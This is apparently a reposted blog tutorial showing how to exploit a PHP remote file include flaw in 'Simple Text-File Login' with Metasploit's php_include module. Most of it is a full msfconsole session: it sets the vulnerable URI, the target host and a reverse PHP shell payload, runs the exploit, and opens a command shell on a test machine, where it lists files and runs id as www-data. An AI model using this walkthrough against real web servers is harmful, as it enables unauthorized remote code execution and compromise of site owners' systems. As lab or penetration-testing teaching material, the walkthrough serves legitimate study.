Using the Metasploit PHP Remote File Include Module

Label: , , ,

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
let's see it in action
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:
hdm
egypt

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:
Space: 32768

Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:

msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010

dir
0.jpeg  header.inc.php license.txt slog_users.txt  version.txt
1.jpeg  index.asp old  slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php

id uid=33(www-data) gid=33(www-data) groups=33(www-data)

0 komentar:

Posting Komentar

Langganan: Posting Komentar (RSS)
Sale! $7.49.com domains at GoDaddy.com - 468x60
o o

Label

portable Internet teaching and learning Top Great Wallpaper Portable software repair word file book reviews download free Portable software Computer others Web software portable word fix word recovery worldwide Antivirus Business Creative teaching Pentesting Windows Big Picture Indonesia Metasploit MS Word Personalized Learning Threats computer forensics Action Plans and Lessons Blog Business Success Radio Blog Talk Radio Blogger Hack change free portable Blogging Leadership free inquiry learning project based learning shortcuts tricks AntiSpam Asia Identity Safe Internet Security Rants and Raves Widgets anti-virus protection doc repair Converter Creative Schools Integrated Learning Menu Ministry NZCurric Network Online Business PDF Report android formulas game global log analysis software virtual assistant work at home Comments Compression Creative teaching Educationalists Google Image Microsoft Mp3 Player Tips Viewer charts exploits formatting gynaecology interviews national standards obstetrics paediatrics perl phishing stellar word repair AV-Test Audio Blog Service Blogger Chrome Creativity DVD Domain Facebook Features Firefox History Language Microsoft Office portable Multimedia NOD32 portable ORTHOPEDICS Online Glossary PHYSIOLOGY Portable Antivirus Portable NOD32 Reader Scan Service State Template Traceroute VPN Video Videos Viruses Vulnerability Web Design antivirus portable customizing eBay free mp3 lookup mp3 download office outlook web access owa printing proxy site rapidshare what are you missing what did they take word recovery tool word repair file 10X 2010 20800mah 2Step 3 A$AP Rocky ANATOMY Access Advanced Uninstaller Akiko Alexa America American Express Animation Anonymous Anyone Apple Safari 3.1.1 Portable Arrington BCBS of TN Backspin Backups Banshee Best Passwords Billiards Blackberry Blog Jet Blog Jet portable CD/DVD Burn Charger Chat Collection Competition Computer viruses Corel Draw X4 Portable Creepy DDoS Desktop Development Dictionary Download free Portable Downloads Drives E N T Educationalists Enable Entertainment Excel FOLLOW ME FORENSIC MEDICINE Fire TV Stick Flashget 1.8 Freeware Full Scope Testing GENERAL MEDICINE Geolocation Giveaway Graphic HEMATOLOGY HTML HTML5 Hacked I C U INTERNAL MEDICINE IPv6 Insight Intelligent Charging. 6.6A/33W. Aluminum 3 USB Car Power Adapter Internet chat messenger Linux LoveWallpapers2010 MICROBIOLOGY Maya Complete Maya Unlimited 2008 Metasploit Pro Michael Microsoft portable Microsoft word portable Mini PC Money Monitoring Most Most Power Car Charger Motivation Mozilla Mozilla Firefox v3.0 Portable Mozilla Firefox Portable Edition v3.0 NEURO MEDICINE NOD32 Norton Account ONCOLOGY Offers Office portable 2010 Online Video Other PATHOLOGY PBS Newhour PDF 2 office PDF to Office PDF2Office portable Paperback Podcasts Portable Adobe Illustrator CS5 Portable All Office Converter Pro 4.0 Portable Blog Jet v.2.0.0.7 Portable Charger Portable USB Portable USB Disk Security Portable USB Disk Security 5.0.0.80 Portable free software Power Bank PowerDVD 8 Deluxe Portable PowerDVD Portable Printer Problems Product Key Product Tutorials Programing Proxy server Quarantine Quick RADIOLOGY RECOSOFT portable Recover Recover Keys Recovery Remove Right Ripper SANS SEO SMRecorder SURGERY SVDownloader Safe Web Scam Scapy School Vision Scurity Search Selena Gomez Smarphone Smart Powe Social network Solid Solutions Space Spam TRAUMA TV Stick Talent Development ThreatCon Toolbar Total Image Converter v2.0.1.0 Traceroute Visulization Track Twitter UROLOGY Uninstall Uninstaller PRO 9.1 VIROLOGY VNC Verification Wanted Webcams Webcast Webmaster Word 2007 portable XP Repair accessdata adobe portable CS5 adware aix app arrays assassin creeds IV author interviews auxiliary modules available biochemistry blackberry enterprise server business toll free number cd burning coldfusion command corel portable corel x4 portable dashboards data crashes data validation dental download game download software drawing drive crashes efile tax extension email recovery encryption europe external drives faster federal tax return extension filing federal tax extension flashget form 4868 free download portable software free download software portable free portabale software free portable mozilla free software free software portable mozilla ftk 2 functions games graphs green ilustrator CS5 portable information theft innovation iphone jboss lft lnk files log2timeline long distance calls long-distance number love notes maya 2008 maya portable mobile broadband mobile devices more mozilla portable navigation netanalysis news nmap opinion options paid to upload password cracking pc viruses portabel games portabel maya portable ESET portable PDF to Office portable blogjet portable game Backspin Billiards portable rapidshare portable safari portable software Portable Autorun Virus Remover 2.3 portable sofware powerpoint prefetch product proxy list ps3 quick r Tri Port Car Charger record regripper repair doc file research rpcclient safari portable scammers scanning scrap files security software XP Repair Pro 2007 sofware portable free spyware system crashes telecommuter temporary files testing the weeknd times toll-free number travel consultant unicornscan update user assist v3.0.657 virtual assistant directories virtual assistant freelance virtual assistant tool virtual assistants virtual jobs virus definition list web application testing webmail website word portable word repair work from home jobs writers z|| Link Exchange
Toko Kaos Satuan

Product




SUCKSHARE.COM My Zimbio o o